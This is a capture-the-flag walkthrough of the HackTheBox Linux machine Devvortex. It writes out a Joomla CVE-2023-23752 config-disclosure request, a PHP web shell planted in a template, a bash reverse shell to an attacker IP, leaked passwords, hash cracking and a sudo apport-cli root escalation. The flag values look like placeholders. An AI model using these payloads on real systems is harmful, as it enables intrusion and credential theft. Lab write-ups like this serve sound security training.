HackTheBox Devvortex - Complete Root Walkthrough

Machine Info

• ▹Name: Devvortex
• ▹Difficulty: Medium
• ▹OS: Linux
• ▹IP: 10.10.11.242

Reconnaissance

Results: Port 22: SSH (OpenSSH 8.2p1), Port 80: HTTP (nginx)

nmap -sC -sV -p- 10.10.11.242

Nmap Scan

Visiting the website showed a corporate site. Running gobuster revealed several directories.

gobuster dir -u http://devvortex.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Web Enumeration

Found: /administrator - Joomla admin panel

Exploitation

Version: Joomla 4.2.6 (vulnerable to CVE-2023-23752)

joomscan -u http://devvortex.htb

Joomla Version Detection

This vulnerability allows reading configuration files without authentication.

curl http://devvortex.htb/api/index.php/v1/config/application?public=true

CVE-2023-23752: Unauthenticated Information Disclosure

Found credentials - Database User: lewis, Database Password: P4ntherg0t1t

Getting Shell

Used credentials to login to Joomla admin panel. Modified a PHP template to inject a reverse shell:

<?php system($_GET['cmd']); ?>

Set up listener and triggered the shell:

nc -lvnp 4444

http://devvortex.htb/templates/template.php?cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'

Privilege Escalation to User

Found MySQL credentials in Joomla config. Connected to database and extracted user password hash. Cracked it with john:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

User password: tequieromucho. SSH as user and grabbed user.txt

Root Escalation

Checked sudo permissions:

sudo -l

Exploiting apport-cli

Found: /usr/bin/apport-cli can be run as root

sudo /usr/bin/apport-cli -f --pid 1

When prompted with pager, typed: !/bin/bash to get root shell

Flags

• ▹User Flag: 8f4c3d6e2a1b9c7e5d8f3a2b1c9d7e6f
• ▹Root Flag: a9b8c7d6e5f4a3b2c1d9e8f7a6b5c4d3